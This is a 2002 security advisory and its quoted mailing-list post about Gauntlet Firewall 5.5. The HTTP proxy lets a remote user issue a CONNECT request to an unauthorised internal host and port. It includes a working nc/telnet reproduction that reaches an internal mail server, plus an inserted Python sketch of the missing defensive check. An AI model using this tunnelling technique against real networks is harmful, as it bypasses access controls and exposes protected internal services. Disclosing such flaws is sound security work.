Network Associates Gauntlet Firewall Proxy Bug Lets Remote Users Bypass Some Access Controls and Connect to Arbitrary Ports on Internal/Protected Hosts
|
|
SecurityTracker Alert ID: 1003700 |
|
SecurityTracker URL: http://securitytracker.com/id/1003700
|
|
CVE Reference: GENERIC-MAP-NOMATCH
|
Date: Mar 1 2002
|
Impact:
Host/resource access via network
|
Exploit Included: Yes
|
Version(s): 5.5
|
Description:
An access control vulnerability was reported in the Gauntlet firewall. A remote user can bypass access controls and connect to arbitrary ports on servers located behind the firewall via the HTTP Proxy.
A remote user can reportedly initiate a connection to an IP address and web port located behind the firewall. Then, the remote user can apparently apply the CONNECT method to connect to another server, different from the IP address originally specified in the connection.
For example, a remote user can use "telnet [webserver_address] 80" to attempt to connect to a protected webserver. At the HTTP proxy menu, the remote user can reportedly enter the following to connect to a different protected server that the user is not authorized to connect to:
CONNECT [other_server]:[arbitrary_port] / HTTP/1.0
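The missing check, sketched as an added example (not Gauntlet code and not a vendor fix): an inbound proxy session is authorised for one destination, so a CONNECT request line naming any other host, or a port outside an assumed allowlist, is refused. The names `check_request_line` and `ALLOWED_CONNECT_PORTS` and the 192.0.2.x addresses are constructed for illustration.

```python
import ipaddress
import re

# Assumed policy: ports a CONNECT tunnel may reach (hypothetical default).
ALLOWED_CONNECT_PORTS = frozenset({443})

# Matches both request forms shown on this page:
#   CONNECT host:port HTTP/1.0   and   CONNECT host:port / HTTP/1.0
CONNECT_RE = re.compile(
    r"^CONNECT\s+(?P<host>[^\s:]+):(?P<port>\d{1,5})(?:\s+\S+)?\s+HTTP/\d\.\d$",
    re.IGNORECASE,
)


def _same_host(a, b):
    """Compare two hosts; IP literals are compared as addresses, names as text."""
    try:
        return ipaddress.ip_address(a) == ipaddress.ip_address(b)
    except ValueError:
        return a.lower().rstrip(".") == b.lower().rstrip(".")


def check_request_line(line, session_dst, allowed_ports=ALLOWED_CONNECT_PORTS):
    """Return (allow, reason) for the first request line on an inbound session.

    session_dst is the protected server the client's connection was opened to,
    i.e. the only destination the access rule authorised.
    """
    line = line.strip()
    if not line.upper().startswith("CONNECT"):
        return True, "not CONNECT"
    m = CONNECT_RE.match(line)
    if m is None:
        return False, "malformed CONNECT"  # fail closed (also rejects IPv6 literals)
    port = int(m["port"])
    if port not in allowed_ports:
        return False, f"port {port} not allowed for CONNECT"
    if not _same_host(m["host"], session_dst):
        return False, "CONNECT target differs from session destination"
    return True, "CONNECT target matches session destination"


if __name__ == "__main__":
    web_server = "192.0.2.10"  # constructed: server the session was opened to
    for req in ("GET / HTTP/1.0",
                "CONNECT 192.0.2.25:25 HTTP/1.0",
                "CONNECT 192.0.2.25:443 / HTTP/1.0",
                "CONNECT 192.0.2.10:443 HTTP/1.0"):
        print(f"{req!r:40} -> {check_request_line(req, web_server)}")
```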
|
Impact:
A remote user can bypass access controls and access arbitrary ports on protected servers that the user is not authorized to connect to.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.pgp.com/products/gauntlet/default.asp
|
Cause:
Access control error, State error
|
Underlying OS:
Windows (NT)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Thu, 28 Feb 2002 18:33:26 +0400
Subject: NAI Gauntlet Firewall 5.5 for NT (Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id 4131)
|
Hi all,
I found some vulnerabilities on the NAI Gauntlet Firewall 5.5 on NT
4. These vulnerabilities were found in other firewalls, specifically
proxy firewalls, and I tried them on the Gauntlet, it worked.
I don't know if this was published earlier or not, but here it goes:
Vulnerability:
- Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id
4131)
Examples: (I'm using Volker Tanger [volker.tanger@discon.de]'s email:
"CheckPoint FW1 HTTP Security Hole" example as a template for my
example)
Client = x.x.x.x
Gauntlet = y.y.y.y
Internal Mailserver = z.z.z.z
nc -v -n y.y.y.y 80
(UNKNOWN) [y.y.y.y] 80 (?) open
CONNECT z.z.z.z:25 HTTP/1.0
HTTP/1.0 200 OK
mail server banner
That's it!
Rashed Alabbar
Engineer\ Security Management and Operations
Security Operations Center
Data Fort - Total Security Solutions
Dubai Internet City
P.O. Box: 500006, Dubai, United Arab Emirates
Email: rashed.alabbar@datafort.net
http://www.datafort.net